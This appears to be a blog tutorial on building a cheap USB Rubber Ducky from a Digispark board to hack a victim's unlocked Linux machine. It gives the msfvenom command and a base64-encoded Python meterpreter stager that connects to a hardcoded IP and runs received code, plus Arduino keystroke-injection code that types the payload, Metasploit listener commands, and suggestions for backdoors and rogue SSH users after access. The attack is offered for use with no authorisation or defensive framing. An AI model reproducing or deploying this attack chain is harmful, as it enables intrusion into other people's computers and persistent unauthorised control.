|

USB Rubber Ducky for 1.5 $ using Arduino and Digispark

Ever heard of  USB rubber ducky? Well, simply it is a programmed USB keyboard which will send the keystrokes to a device connected to it and can be used to hack unlocked machines. A Simple USB Stick which acts as a HID. What is HID? It comes along the way. It costs nearly 45 $.

What if you could make a rubber ducky for just 1.5 $?
Yes. It is possible. Its time to make our hands dirty. In this post, I will show you how you can hack a Linux machine using a Digispark Rubber Ducky.

Watch this step by step explained tutorial

 What is HID?

HID or Human Interface Devices are Devices that takes input from human and pass it on to the device connected to it. HID devices includes keyboard, joystick, mouse, touch pad, graphic tablet etc. There is a Library available in arduino which enables Digispark to acts as a keyboard and send keystrokes to PC. We are making use of this library to execute a metasploit reverse shell python code in the victim’s machine and gain a reverse shell.

Metasploit

In a nutshell, Metasploit framework is a collection of tools which can be used to write exploits and penetrate into remote machines. This tool is pre-installed in kali linux. In a moment, I will show you how it is done.

Lets Get Started

Prerequisites

First of all you should wknow what is digispark, how to setup and install digispark in your arduino IDE and upload a sketch in digispark.
The below video explains everything you need to know about it.
Digispark installation In Windows
Digispark Installation In Linux

Digispark as HID

Now you know how to upload a code. Below is a Simple code which prints “Welcome to Green Terminal” every 5 seconds. Make sure you have DigiKeyboard.h library installed.

#include “DigiKeyboard.h”

void setup()
{

}
void loop()
{

DigiKeyboard.println(“Welcome to Green Terminal ! “);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(5000);
}

If you have done it correctly, after upload, it will automatically send the programmed keystrokes every 5 seconds.

Metasploit

Next, We have to create a code which when executed in the victims machine initiates a reverse tcp connection. In the Terminal, execute the below command.msfvenom -p python/meterpreter/reverse_tcp LHOST=<IP ADDRESS OF YOUR MACHINE> LPORT=<PORT FOR REVERSE SHELL TO CONNECT ON> R > pythonpayload.py

This will create a payload named pythonpaload.py.
The contents of the file looks somewhat like this

import
base64,sys;exec(base64.b64decode({2:str,3:lambda
b:bytes(b,’UTF-8′)}[sys.version_info[0]](‘aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQpzLmNvbm5lY3QoKCcxMC45LjcuMjA3Jyw5MDAwKSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==’)))

Now open that tile and copy all the contents in the file as show in the video.

 

 

Programming Digispark as Rubber Ducky

Below is the code which is to uploaded to digispark. Copy the contents of the pythonpayload.py and paste it in the 9th line.#include “DigiKeyboard.h”

void setup()
{
DigiKeyboard.delay(2000);
DigiKeyboard.sendKeyStroke(KEY_T , MOD_CONTROL_LEFT | MOD_ALT_LEFT);
DigiKeyboard.delay(2000);
DigiKeyboard.println(“python “);
DigiKeyboard.delay(500);

DigiKeyboard.println(“Paste the python code here”);

DigiKeyboard.delay(1000);
DigiKeyboard.println(“quit()”);
DigiKeyboard.delay(500);
DigiKeyboard.println(“exit”);

}

void loop()
{

// DigiKeyboard.println(“Welcome to Green Terminal ! “);
// DigiKeyboard.sendKeyStroke(KEY_ENTER);
// DigiKeyboard.delay(5000);
}

Basically, what this code does is

  1. Wait for 2 seconds
  2. Press ALT + CONTROL + T to open up the terminal
  3. Wait for 2 seconds
  4. Type in ‘python’ and Press Enter to start Python
  5. Wait for 0.5 seconds
  6. Type in the python exploit code and press enter to execute it
  7. Wait for  1 second
  8. Type ‘quit()’ and press enter to exit python
  9. Wait for  0.5 seconds
  10. Type exit and press enter to exit the terminal.

Now, Upload the code.

Setting Up the Listener

Next we have to start the listener which will wait for incoming connections in the given port. Fire up metasploit and execute the below codes in order.

msfconsole
use multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST <IP ADDRESS OF YOUR MACHINE>
set LPORT <PORT FOR REVERSE SHELL TO CONNECT ON>
exploit

This will start the listener.

Launch the Attack

Now all you have to do is connect this digispark to our Victims unlocked machine.
All you need is a 10 second window. All the codes will run in 5 seconds.
Once you get the shell, you can do almost anything with that; create a persistent back door, upload or download files, create another user and provide it SSH access, possibilities are endless.

Similar Posts

0 Comments

  1. Thank you for another informative site. Where else may I am getting that kind of information written in such a perfect manner? I have a project that I’m simply now working on, and I have been on the glance out for such information.

Leave a Reply

Your email address will not be published. Required fields are marked *